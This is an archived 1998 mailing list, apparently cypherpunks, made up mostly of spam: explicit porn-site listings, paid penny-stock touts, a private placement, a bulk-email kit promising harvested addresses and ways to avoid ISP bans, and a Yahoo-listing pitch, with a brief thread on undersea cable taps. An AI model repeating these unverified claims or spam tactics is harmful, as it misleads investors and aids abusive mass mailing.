Preflight Pro provides you with a familiar environment to review files
prior to printing. Further, Preflight Pro now supports documents in all
the major graphics applications including Adobe PageMaker, Illustrator,
Photoshop, Acrobat, QuarkXPress, Macromedia FreeHand EPS, and Multi-Ad
Creator2.

What's New in Preflight Pro 2.1?  Now you can inspect Acrobat PDF files,
along with files from all the other major graphics applications.
Preflight Pro 2.1 now examines PDF files using more than 40 different
profile items, including document security settings, font subsetting and
embedding, downsampling rates and compression types.

Better yet, Preflight Pro also includes 5 free copies of Collect Pro
2.1. Give Collect Pro to any creative professional you work with to help
them correctly collect a job for hand-off to the prepress house. 
Collect Pro eliminates the problems of missing files (e.g.: fonts and
linked graphics) that can delay a job. 


Extensis Preflight Pro 2.1 will dramatically streamline your preflight
workflow, saving you time, headaches and money. 

For more information, to order, or to download a FREE, 30-day demo of
Extensis Preflight Pro, please visit: 
http://www.extensis.com/products/PreflightPro
Or call your Extensis Preflight Specialist at (800) 796-9798 x.168  or
(503) 274-2020 x.168 or email to: preflight@extensis.com . 

Already own Preflight Pro 2.0? 
NO PROBLEM!  Visit http://www.extensis.com/products/PreflightPro and
download Preflight Pro 2.1 for free (your Preflight Pro 2.0 serial
number is required)

Are you a FlightCheck(r) User?
NO PROBLEM!  Upgrade to Extensis Preflight Pro 2.1 for only $99.95
(SAVE $300!)

Preflight Pro 2.1 and Collect Pro 2.1 are compatible with QuarkXPress
3.31 or later, including QuarkXPress 4.0, Adobe PageMaker 6.5 and later,
Adobe Illustrator 5.5 and later, Adobe Photoshop 3.0.4 and later,
Macromedia FreeHand 5.5 and later, and Multi-Ad Creator2 version 1.0.

PS. We have made every effort to ensure this message is being sent only
to people who have expressed interest in Extensis products.  If we have
sent this to you in error, please accept our apologies and reply with
remove in the subject line for automatic exclusion from future
communications.  If you know someone who would like to be on our mailing
list have them send an email to listmaster@extensis.com with ADD in the
subject line and their email address in the body.

P.P.S. This message is intended for customers in North America.  If you
are located outside of North America and have received this message,
please visit www.extensis.com/purchase/ to find the nearest local
distributor in your country.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rusik" <rusik_98@chat.ru>
Date: Thu, 5 Nov 1998 10:33:30 -0800 (PST)
To: <janlee@cs.vt.edu>
Subject: internet
Message-ID: <002701be08ea$ce6d6d80$2ba2a6c3@------>
MIME-Version: 1.0
Content-Type: text/plain




Hi.
i need to crack my internet provider. he use 
windows 95 operation system.
can you help me??? have you any crackers?? or 
you know where i can find them or any literature that can help 
me???
 
BYE
with my best wishes
Rusik


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED FRI NOV 6 <stuffed@stuffed.net>
Date: Fri, 6 Nov 1998 08:27:08 -0800 (PST)
To: (OVER 100 FREE PICS DAILY!)
Subject: 100S OF FREE PICS'N'LINKS EVERY DAY!
Message-ID: <19981106081000.9419.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ A SEXY GIRL
+ TRAMPVILLE
+ HOT BABES
+ SEXY BLACK BABES
+ TABBY'S 007 PUSSY
+ PANTIES & LACE
+ ANAL DESIRES
+ VERY WET FETISH SITE
+ SEX GALLERY
+ LADY PASSION'S EROTIC HAVEN
+ BONUS PIC 1 -> http://www.stuffed.net/home/3392.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/2117.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/5753.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/6184.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/2539.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: informer@earthlink.net
Date: Fri, 6 Nov 1998 14:42:25 -0800 (PST)
Subject: No Subject
Message-ID: <199811062242.OAA04144@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


11/06/98

INTERNET  NEWS:BUSINESS  WIRE 2:36pm EST

Re:21st  Century  Frontier  Group, Inc. Nasdaq OTC:"TCFG"

TCFG  strikes  $150mm  deal  with  Sumitomo  Bank, Japans'
2nd  largest  bank  for  construction  of  6  hotels  and
casinos, the  first  of  which  to  be  built  in  San  Juan,
Puerto  Rico!
 

 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: privateplacement@royal.net
Date: Sat, 7 Nov 1998 00:36:23 -0800 (PST)
Subject: securities - PRIVATE PLACEMENT WSG TECH, INC.
Message-ID: <199811070810.CAA14003@mail.naviomar.com.mx>
MIME-Version: 1.0
Content-Type: text/plain


Opportunities in manufacturing and marketing patented products. This
announcement is neither an offer to sell nor a solicitation of an offer to
buy these securities.  Sales will be made only by a final Offering
Memorandum and only in states where these securities may be offered in
compliance with the securities laws of such states.  The final
Offering Memorandum will NOT be available to residents of the states of
Hawaii, Washington, or Wisconsin.  PRIVATE PLACEMENT MEMORANDUM REGULATION
- RULE 504 UNDER THE SECURITIES ACT OF 1933.  500,000 Shares of
Common class non-voting stock.  (Par Value $.001 Per Share) $2.00 Per
Share with a 5,000 Share Minimum of WSG Tech, Inc.  WSG Tech, Inc.
(Company), a Nevada corporation was incorporated in Nevada in August
1998.  The Company owns the manufacturing and distribution rights, or
has the Options to the rights of several commercially viable patented
products, and is negotiating for others.  The firm also owns the option to
purchase an established manufacturing firm with over twenty (20) years of
continuous profitable performance.  The completion of this purchase
will give WSG Tech, Inc. complete control over the manufacturing, sales,
distribution and fulfillment of its own products.  It will also give
the Company a core business of manufacturing for other clients as well as
an experienced production and sales staff.  The Company has recently
concluded an Agreement with an International marketing firm, and is
negotiating an agreement for the manufacture and distribution of its
products in Europe and South America.  The Company's corporate mailing
address is P.O. Box 541732 Lake Worth, Florida 33454 USA  The company is
offering to the public an invitation to participate in the funding of the
company.  For a copy of the Offering Memorandum, you may contact the
Company's investment consultant, e-mail us at privateopportunity@bigfoot.com
Be sure to put "Send Me A Copy" in the Subject Line and include your name
and address.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: info@hot-stock.com
Date: Sat, 7 Nov 1998 05:27:16 -0800 (PST)
To: user@the.internet
Subject: ADV: Hot-Stock Discovers Emerging Entertainment Company
Message-ID: <199811071811.NAA16377@mars.cyber-website.com>
MIME-Version: 1.0
Content-Type: text/plain


To be removed from our mailing list, simply reply with "Remove" in the subject line.

J.P. Morgan, the world famous banker at the American Bankers Convention in 
1903 was asked what was the secret of his success.  He replied "Opportunity
passed me every single second of my life, but I was perceptive enough to
take advantage of these opportunities."  The time is always now!

Companies providing live streaming video content such as Broadcast.Com
have had valuations as high as one billion dollars.  Alternative 
Entertainment is a live streaming video content provider for Adult related
Internet sites.  Adult related sites on the Internet are not only 
profitable but represent the largest segment of E-Commerce and generate 
1.2 billion in annual revenues.

Visit http://www.hot-stock.com for full details.

Alternative Entertainment (OTC BB : BOYS)
Shares Outstanding 3,013,790 
Shares Public Float 980,000 
Number Shareholders 790
Approved by NASD for Trading October 7, 1998

Visit http://www.hot-stock.com for full details.

COMPANY OVERVIEW

Alternative Entertainment, Inc. (the "Company") is engaged in the Adult 
Media and Entertainment Industry. Specifically, the acquisition, 
development and operation of Upscale Gentlemen's Clubs and advanced 
on-line media for E-Commerce on Internet Sites. The Company plans a 
national chain of Upscale Gentlemen's Clubs with the focus on business 
and professional male patrons. The main floor, which caters to patrons 25 
to 39 years of age, will incorporate an evolving theme concept conducive 
to a "party atmosphere" and will operate under the trade name BOYS TOYS. 
Private club facilities of the Boardroom Restaurant will target individuals 
ages 40 to 65 and offer full service dining, an extensive cigar lounge and 
a vast selection of premium wines and liquor.

The clubs will enable the Company to facilitate onsite film production and 
live video streaming of the female entertainers as content to the on-line 
community. Initially the live content will provide revenues via E-Commerce 
on Company owned Web Sites. Such content will later be repackaged and 
distributed through Webmasters and individual owners of the 45,000 
established Adult Sites on the Internet.

The Company has an extremely strong management team comprised of several 
key executives, including the president, of the leading management company 
within the Gentlemen's Club Industry. The management team has over 100 years 
of combined knowledge of the Industry.

 

INDUSTRY HIGHLIGHTS

$4 Billion a year Gentlemen's Club Industry - 25% pretax margins 
3,618,000 average yearly revenue per upscale club - $488 sales per sq. ft.  
36% of all businessmen entertain their clientele at Gentlemen's Clubs 
$1.2 Billion a year Internet Adult Sites - 70% pretax margins 
Media content providers are basically non-existent 
Consolidation play exists for both segments of the industry
 

SELECTIVE FINANCIAL HIGHLIGHTS

The Company has internally raised $2,000,000 to date through a combination 
of equity and convertible debt. The Company has a San Francisco property 
(15,000 sq. ft.) under construction and an option to purchase two additional 
clubs.


Once again visit http://www.hot-stock.com for full details.


--- Disclaimer ---

This material is being provided by Hot-Stock, an electronic newsletter 
paid by the issuer for publishing the information contained in this report.
Alternative Entertainment, Inc. has paid a consideration of 5,000 shares of 
common stock of Alternative Entertainment, Inc. to Hot-Stock as payment for 
the publication of the information contained in this report.  Hot-Stock 
and its affiliates have agreed not to sell the common stock received as 
payment for its services until November 1, 1998, which date is 15 days 
from the initial dissemination of this report.  After such date, Hot-Stock
may sell such shares.  Because Hot-Stock is paid for its services, there 
is an inherent conflict of interest in Hot-Stock's statements and opinions 
and such statements and opinions cannot be considered independent.  
The information contained in this publication is for informational purposes 
only, and not to be construed as an offer to sell or solicitation of an 
offer to buy any security.  Hot-Stock makes no representation or warrant 
relating to the validity of the facts presented nor does Hot-Stock represent 
or warrant that all material facts necessary to make an investment decision 
are presented above.  All statements of opinions are those of Hot-Stock.  
Hot-Stock relies exclusively on information gathered from public filings 
on featured companies, as well as, in certain circumstances, interviews 
conducted by Hot-Stock of management of featured companies.  Investors should 
not rely solely on the information contained in this publication.  Rather, 
investors should use the information contained in this publication as a 
starting point for conducting additional research on the featured companies in 
order to allow the investor to form his or her own opinion regarding the 
featured companies.  Factual statements contained in this publication are 
made as of the date stated and they are subject to change without notice.  
Hot-Stock is not a registered investment adviser, broker or a dealer.  
Investment in the companies reviewed is speculative and extremely high-risk 
and may result in the loss of some or all of any investment made in 
Alternative Entertainment, Inc.  This publication contains forward-looking 
statements that are subject to risk and uncertainties that could cause 
results to differ materially from those set forth in the forward-looking 
statements.  These forward-looking statements represent the judgment of 
Alternative Entertainment, Inc. as of the date of this publication.  The Company 
disclaims any intent or obligation to update these forward-looking statements.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED SAT NOV 7 <stuffed@stuffed.net>
Date: Sat, 7 Nov 1998 01:10:26 -0800 (PST)
To: (100S OF FREE DAILY PICS!)
Subject: 100S OF FREE PICS'N'LINKS EVERY DAY!
Message-ID: <19981107081000.9534.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ XXX EROTIC SEX
+ PORNFEEDS
+ FREE HARDCORE
+ MY BUTT COLLECTION
+ WET DREAMS
+ THE IDEAL NUDE BEACH
+ ADULT-WEBSITES.COM
+ ASIAN BELLES
+ MISS TEASE FREE XXX PLAYHOUSE
+ GOT XXX?
+ BONUS PIC 1 -> http://www.stuffed.net/home/30774.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/13351.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/19889.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/20707.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/31569.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Email Ad: <wwwnet65@mailexcite.com>
Date: Sun, 8 Nov 1998 07:41:19 -0800 (PST)
To: @
Subject: Advertise to Millions On-Line...New WWW Marketing Package
Message-ID: <199811081541.HAA29750@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


To automatically be removed from all
future mailings please reply with 
"Remove" in the subject heading.
-----------------------------------------



Keep reading to find out how you can...Reach 
MILLIONS of potential Customers Overnight!

THOUSANDS of companies are sending out Bulk 
Email to dramatically maximize their profits!

Why aren't YOU?

Despite what you've heard...BULK EMAIL WORKS!

If Bulk Email didn't work, THEN YOU WOULDN'T 
BE READING THIS!

===> Even FORTUNE 500 companies send out 
Bulk Email to Hundreds of Thousands of 
people every single day.

===> Power Promotions, an Internet Marketing 
Company, claims to be making over $500,000
every single year in Bulk Email alone!

===>Many webmasters draw THOUSANDS of NEW 
visitors to their sites DAILY!

===>You don't even need a web site to take 
advantage of Bulk Email!

===>You can generate an endless amount of 
quality leads for ANY business opportunity 
or MLM.

===>You can save $$$ doing your own mailings 
with the latest Bulk Email software!



When you receive a Bulk Email advertisement, do 
you realize that HUNDREDS of THOUSANDS of PEOPLE 
from all over the world received that same Bulk 
Email advertisement?  

Could your business benefit from such a dramatic 
increase in exposure?

Here's what a respected national newspaper said 
regarding the use of Bulk Email:

"Many business people are finding out that they
can now advertise in ways that they never could 
have afforded in the past. The cost of sending 
mass e-mail is extremely low, and the response 
rate is high and quick." - USA TODAY

Let's keep in mind that the only expense involved 
with using Bulk Email is:

1. Purchasing Bulk Email Software
2. An Internet Connection ($19.95 A Month or Less)

Email is FREE...whether you send 100 or 1 million.  
It is by far the FASTEST and LEAST EXPENSIVE way 
to generate large volumes of sales in a short 
period of time.

Comparison of Bulk Email vs Conventional Forms 
of Advertising:

=> A Bulk Mailing to 250,000 People through 
the Postal Service will cost you about $125,000.

=> A Web Site Banner Advertisement to 250,000  
People on the Internet will cost you about $2,500.

=> A Bulk Emailing to 250,000  People on the 
Internet will cost you NOTHING. 

DO YOU HAVE A WEB SITE?If so, you probably spend 
THOUSANDS of DOLLARS and HOURS advertising your 
web site on:

* Newsgroups
* Search Engines
* On-line Classifieds
* Banner Advertisements
* Link Exchanges

And still, you only receive a few thousand hits
 per day.

A) A previous web site of ours that opened on 
June 23rd, 1997 had a total of 1600 visitors.

B) We sent out a Bulk Email Advertisement for 
our web site to 200,000 people that same day.

C) By the next morning our counter indicated 
that we had received 12,763 Hits in LESS THAN 
24 HOURS!

You can expect the SAME, if not BETTER results
when advertising YOUR web site to MILLIONS of 
people through Bulk Email, and using our 
techniques and software you will NOT risk 
losing your ISP or web host account.

DO PEOPLE ACTUALLY BUY ANYTHING FROM THE I
INTERNET?

A recent survey by Survey Net on the purchasing 
habits of internet users, indicates that 50% 
of people have purchased something from the
Internet, 40% of people have made several 
purchases from the Internet 80% of people 
like the idea of shopping on a computer, 50% 
of on-line purchases are computer/information 
related ,20% of people have purchased from 
the Internet for the reason: 

"I came across it and I liked it, so I 
bought it."

But how can they buy from you if they don't know
you exist? Until now there has never been such 
a dramatically COST-FREE method of advertising.
Now that you have seen how Bulk Email can 
DRAMATICALLY maximize your business profits, you 
may be wondering... HOW DO I SEND OUT BULK EMAIL?? 

The most obvious solution is to purchase bulk email
software ranging in price from $200 - $399 that will
allow you to send your ad to email addresses you collect.


A better solution would be to order our "Bulk Email
Secrets" package that will provide you with EVERYTHING
you need to begin bulk emailing with great results 
immediately!

You Get:

#1..Bulk Email Software

We'll show you where to get:

Desktop Server 98 - (A powerful bulk emailer that actually sends
email through YOUR computer, not your ISP!)

Rapid Fire Mail Server - (A FAST bulk emailer similar to Desktop 
Server 98. Run both simultaneously for rocket fast mailings!)

Atomic Harvester - (An email address locator that will log on to 
the WWW and collect targeted lists of email addresses!)

List Manager - (An email list database manager. Lots of features. No
bulk emailer should be without this one!)


The above software titles sell for $199-$299 anywhere else, but 
they're yours free as part of this incredible new internet marketing
package!


You'll also get a copy of "Bulk Email Success Secrets" 
which will reveal to you all the insider information needed for
success using bulk email.  Bulk Email can bring AWESOME results
but ONLY if you have the right information.

Some topics covered include:

<Bulk Email Laws&Regulations>
YES, Bulk Email Is 100% Legal if you 
follow a few simple guidelines.

<Bulk Email Response Handling Techniques>
You'll learn how to easily and AUTOMATICALLY 
set your computer up to filter and respond 
to ALL your incoming email! Put your business
on Auto-Pilot!

<Keeping Your ISP & Web Host Account Safe>
Finally PROVEN and SIMPLE ways to bulk email 
as much as you want and NOT lose your good 
standing with your web host/ISP. Learn how to 
use Free Email Accounts and Free Auto responders
with your bulk email advertising.

<Writing Effective E-Ads>
Over 10 pages containing tips on writing 
order pulling email ads. Actual examples 
included!

<Best Selling Items On-Line>
Have you ever wondered what REALLY sells on-line?
The right product and advertising will make you money.
We list the HOTTEST selling items on-line (you'll 
be AMAZED at the profit margins of these products)!


Plus Much More Insider Information!

A constant supply of FRESH, DELIVERABLE, TARGETED
email addresses is one secret to getting great 
results with bulk email. 


With your order you'll also receive via email 100,000 
email addresses EVERY SINGLE WEEK FOR ONE FULL YEAR!

The addresses will be filtered through a global remove
list and all .edu, .mil, .gov and other undesirable
domains will be automatically removed.


Here are ACTUAL TESTIMONIALS of current club 
members:

"I have been able to make $3175 by promoting 
my company through direct email. This is
only from sending out to about 12,000 people 
and selling a product which costs $25. This 
is more than I had expected."
RICHARD SCHOTT - Pasadena, CA

"Within 10 days I was able to collect over 
100,000 email addresses and make a profit of
$4,000." MATT ALLEN - Omaha, NE

"I recently started a new business on line. 
After my first mailing I got over 400 people 
to join my company in 5 days!" 
DAVID SHEENHAM - Dallas, TX

"I previously purchased bulk email software 
and collected 20,000 new addresses a week if I
was lucky. The first mailing I did I lost my ISP
and Web Host account. The information I get from
this unique club has helped me reach HUNDREDS of
people via email on a regular basis and I've kept
my primary ISP with no cancellation."
Michael Logan - Kansas City, KS

You can order our "Bulk Email Secrets" 
for only $149.00. 


FREE BONUS GIFTS IF YOU ORDER BEFORE NOVEMBER 25TH...

300 Small Business Reports/Internet Marketing Guides
(Give them away free as incentives for your customers or
sell them for profits!)

Check Acceptance Software
(Would you like to accept checks by phone or fax? This software
will allow you to do just that! Your sales will increase by 
offering this easy to use service.)


If you've ever contemplated using bulk email to promote your 
service/product then this is the ONLY offer you should take
advantage of! You will not find a better value for your 
money anywhere else. 

More importantly than the software itself is the wealth of
information you'll get regarding bulk email and internet marketing
in general. We reveal to you PROVEN techniques. We have been 
bulk emailing for years promoting our own services and can show
you how to generate a high volume of sales in a short period of
time.



If you have any questions at all or would 
like additional information please email us 
at:

sendinfo@mailcity.com


We also provide full service Bulk Email
Broadcasting.  We'll do the mailings for you and
forward all responses to you on the daily basis.

For rates and info please
email us at sendinfo@mailcity.com


Thank You for Your Time.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED SUN NOV 8 <stuffed@stuffed.net>
Date: Sun, 8 Nov 1998 08:50:35 -0800 (PST)
To: (100S OF FREE DAILY PICS!)
Subject: 100S OF FREE PICS'N'LINKS EVERY DAY!
Message-ID: <19981108081000.9047.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ ADULT INTERNET XXX
+ BONEME.COM
+ EARTHQUAKE NUDE WOMEN
+ SIMPLY STUNNING
+ HENTAI BIJUTU
+ ULTIMATE SLUTS
+ TABBY'S 007 PUSSY
+ MASTURB8
+ INSTANT BONER
+ EROTICA EXOTICA
+ BONUS PIC 1 -> http://www.stuffed.net/home/25388.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/24585.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/1257.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/2462.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/27831.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Renegade <renegade@texoma.net>
Date: Sun, 8 Nov 1998 17:08:24 -0800 (PST)
To: John Young <jya@pipeline.com>
Subject: Re: Spy News
In-Reply-To: <199811081454.JAA30292@dewdrop2.mindspring.com>
Message-ID: <3.0.5.32.19981108190424.007c4b90@texoma.net>
MIME-Version: 1.0
Content-Type: text/plain


None of them were even known, much less found, until Ronald Pelton starting
pointing them out to the russkies on a world map.

At 09:45 AM 11/08/1998 -0500, John Young wrote:
>NYT reports today on a new book, "Blind Man's Bluff,"
>which reports on the US's success at placing surveillance 
>devices on Soviet subsea communications cables around 
>the world. With much technical detail about how it was 
>done, beginning with the simple but overlooked idea of 
>locating shoreline warning signs about undersea cables 
>then tracking from there.
>
>The devices, some up to 20 feet long for housing elaborate 
>processing equipment, captured electronic emanations, thereby 
>eluding detection measures aimed at physical taps. One was 
>found by the Soviets but  most were not and much information 
>on the program is still classified.
>
>AT&T and Bell labs built many of them. The US Navy will not 
>comment on the book, citing national security restrictions.


-Renegade




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@die.com>
Date: Sun, 8 Nov 1998 20:20:40 -0800 (PST)
To: Steve Schear <schear@lvcm.com>
Subject: Re: Spy News
In-Reply-To: <199811081454.JAA30292@dewdrop2.mindspring.com>
Message-ID: <19981108232025.G15373@die.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, Nov 08, 1998 at 02:51:07PM -0800, Steve Schear wrote:
> 
> With the advent of fiber optics capable of repeater-less operation over
> transoceanic distances, one would think this sort of underwater surveilence
> would be come much more difficult.

	Actually they use optical amplifiers rather than repeaters and
are thus repeaterless in that sense rather than depending on the loss of
a single passive fiber being small enough to work all the way across
the pond.   But one supposes the technology of tapping the cables must
have been developed, though indeed a lot harder because one has to
actually dig into the cable (and deal with the high voltage for powering
the amplifiers and so forth) and tap the individual fibers with quantum
coupling type taps.   And one supposes the taps are more detectable.
The whole issue may be moot by virtue of the extent to which the carriers
are in bed with UKUSA anyway, however, as there aren't very many fiber
cables run by unfreindly parties unwilling to part with the bitstream...


> 
> --Steve
> 
> 

-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: trgz941@netscape.com
Date: Mon, 9 Nov 1998 05:12:46 -0800 (PST)
Subject: BOOST YOUR WEB SITE'S TRAFFIC--GET LISTED ON YAHOO!
Message-ID: <DOn5NbKACRT35>
MIME-Version: 1.0
Content-Type: text/plain


BOOST YOUR WEB SITE'S TRAFFIC--GET LISTED ON YAHOO!


----------------

THE MARKETING BENEFITS OF HAVING A YAHOO! LISTING


FACT: Yahoo! is the most important search engine/directory 
on which your Web site can be listed.  

FACT: Independently conducted Internet studies show that 
42% of all Internet traffic and 70% of all business-to-
business Web site traffic is generated from Yahoo!.

FACT: Getting your Web site listed on Yahoo! is without 
question the single most important marketing step you can 
take to promote your Web site. 


EXAMPLE: For some of our clients, a Yahoo! listing is the 
only Internet advertising they have--and the only 
advertising they need. 

EXAMPLE: Some of our clients now receive over 20,000 
hits per *day* and do well over $100,000 in Internet sales 
per month--not from expensive advertising, but all from a
single Yahoo listing.




----------------

YAHOO! REJECTS 90% OF ALL SUBMITTED WEB SITES--BE IN THE 10%


PROBLEM: In case you didn't know, Yahoo!'s staff rejects 
over 90% of the submissions they receive. 


SOLUTION: Our R&D division has studied hundreds of sites--
both those that have been successfuly indexed and those that 
have been rejected.

SOLUTION: Based on our findings, we've helped hundreds of 
clients not only get their site into the Yahoo! index, but 
into a very prominent place within that index. 

The Yahoo! Project Team can do the same for you.




----------------

MY SITE HAS ALREADY BEEN REJECTED BY YAHOO! WHAT CAN I DO?

PROBLEM: "I submitted my site to Yahoo! but it was rejected. 
What can I do now?"

SOLUTION: If your site has already been rejected--don't 
despair. We've helped many clients' sites get into Yahoo!'s 
index even after they've been rejected.





----------------

THE YAHOO! SITE SELECTION PROCESS--IN A NUTSHELL

"I can just submit my URL and be considered for a listing, 
right? It's easy, isn't it?"

No. It's not. Read on to learn why.


PROBLEM: Every site that gets accepted into the Yahoo! 
directory is scrutinized by a Yahoo! "editor." The first 
step in the submission process is to get an already 
overworked editor to look at your site.

SOLUTION: We have a carefully-researched technique to 
help your site's chances of being examined.



PROBLEM: Before submitting, your site *must* be prepared
for the Yahoo! editor's "10 minute lookover." In order
to grab that editor's attention--and get listed--you need
to understand what he or she will be examining to 
determine if your Web site gets a Yahoo! listing.  

SOLUTION: Our R&D division has studied hundreds of Yahoo! 
rejection letters and learned why Yahoo! editors commonly 
reject sites. In short, we can *tell* you 




----------------

SOLUTION: THE "SECRETS TO GETTING A TOP YAHOO! LISTING" REPORT

We offer an information-packed "Secrets to getting a top 
Yahoo! listing" report that will tell you exactly what 
Yahoo! editors will be looking for when they evaluate your 
site. 

You can learn from hundreds of other people's mistakes so 
that you won't make them when submitting--or resubmitting--
your site.


Here's what's covered in the report:

<> A general overview of Yahoo! and how it works

<> The technical details of what they look for 

<> What *specific* types of content you *must* have

<> What *never* to do before submitting to Yahoo!

<> Why looking at your competitors is so important before
     submitting

<> The specifics of how to submit properly to skyrocket
     your chances

<> The best-kept secret on the net: this single submission 
     technique alone has achieved top rankings for many of
     our clients!
   

----------------

FOR THE SERIOUS SITE OWNER--THE CUSTOMIZED YAHOO! EVALUATION


We also offer a "Customized Evaluation" service where we'll 
examine your site like a Yahoo! editor will--and tell you, 
step-by-step, each of the changes you'll need to make before 
submitting to Yahoo!.


The "Customized Evaluation" includes all of the information 
from the "Secrets to getting a top Yahoo! listing" report *plus*:

<> A customized evaluation of your competitors' sites and why 
      they are so important to consider before submitting

<> An evaluation of your site's technical specs. and 
      recommendations for improving them

<> An evaluation of your site's content and recommendations 
      for improving it





----------------

SUMMARY: WHY YOU NEED A GOOD LISTING ON YAHOO!

(1) If you're thinking of submitting your site to Yahoo!
--or have already tried and failed--put our research and 
the failure of others on your side.

(2) Let us help you dramatically improve the effectiveness 
of your on-line marketing efforts. Preparing your site for
Yahoo! is worth the extra effort.

(3) Remember: Yahoo! is the only *free* Internet marketing
resource that can help you to increase your long-term goals 
of widespread exposure and profitability.

(4) Best of all, once your listed in Yahoo, you're there 
forever. This one-time effort will be rewarded with years of
residual benefits.
benefits



----------------

PRICING

"Secrets to getting listed on Yahoo!" report -- $99

Customized Web site evaluation (incl. report) -- $249




----------------

CONTACT US:    Call us at:  (314) 994-1286

<> Learn more about the Yahoo! project and us.  We'll explain
exactly how we can maximize your particular site's chances
of a top Yahoo! listing

<> We'd love to answer any questions you might have! 

<> It could be the single most important phone call you'll ever
make when it comes to the on-line success of your website!

                            (314) 994-1286


 




----------------
If you've received this E-mail in error, or do not desire to receive 
any further mailings from the Yahoo! Project Team, please REPLY to
this E-mail with the word "REMOVE" in the E-mail's subject line.

Thank you.















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: trgz941@netscape.com
Date: Mon, 9 Nov 1998 05:14:33 -0800 (PST)
Subject: BOOST YOUR WEB SITE'S TRAFFIC--GET LISTED ON YAHOO!
Message-ID: <724mlh8h7UOO>
MIME-Version: 1.0
Content-Type: text/plain


BOOST YOUR WEB SITE'S TRAFFIC--GET LISTED ON YAHOO!


----------------

THE MARKETING BENEFITS OF HAVING A YAHOO! LISTING


FACT: Yahoo! is the most important search engine/directory 
on which your Web site can be listed.  

FACT: Independently conducted Internet studies show that 
42% of all Internet traffic and 70% of all business-to-
business Web site traffic is generated from Yahoo!.

FACT: Getting your Web site listed on Yahoo! is without 
question the single most important marketing step you can 
take to promote your Web site. 


EXAMPLE: For some of our clients, a Yahoo! listing is the 
only Internet advertising they have--and the only 
advertising they need. 

EXAMPLE: Some of our clients now receive over 20,000 
hits per *day* and do well over $100,000 in Internet sales 
per month--not from expensive advertising, but all from a
single Yahoo listing.




----------------

YAHOO! REJECTS 90% OF ALL SUBMITTED WEB SITES--BE IN THE 10%


PROBLEM: In case you didn't know, Yahoo!'s staff rejects 
over 90% of the submissions they receive. 


SOLUTION: Our R&D division has studied hundreds of sites--
both those that have been successfuly indexed and those that 
have been rejected.

SOLUTION: Based on our findings, we've helped hundreds of 
clients not only get their site into the Yahoo! index, but 
into a very prominent place within that index. 

The Yahoo! Project Team can do the same for you.




----------------

MY SITE HAS ALREADY BEEN REJECTED BY YAHOO! WHAT CAN I DO?

PROBLEM: "I submitted my site to Yahoo! but it was rejected. 
What can I do now?"

SOLUTION: If your site has already been rejected--don't 
despair. We've helped many clients' sites get into Yahoo!'s 
index even after they've been rejected.





----------------

THE YAHOO! SITE SELECTION PROCESS--IN A NUTSHELL

"I can just submit my URL and be considered for a listing, 
right? It's easy, isn't it?"

No. It's not. Read on to learn why.


PROBLEM: Every site that gets accepted into the Yahoo! 
directory is scrutinized by a Yahoo! "editor." The first 
step in the submission process is to get an already 
overworked editor to look at your site.

SOLUTION: We have a carefully-researched technique to 
help your site's chances of being examined.



PROBLEM: Before submitting, your site *must* be prepared
for the Yahoo! editor's "10 minute lookover." In order
to grab that editor's attention--and get listed--you need
to understand what he or she will be examining to 
determine if your Web site gets a Yahoo! listing.  

SOLUTION: Our R&D division has studied hundreds of Yahoo! 
rejection letters and learned why Yahoo! editors commonly 
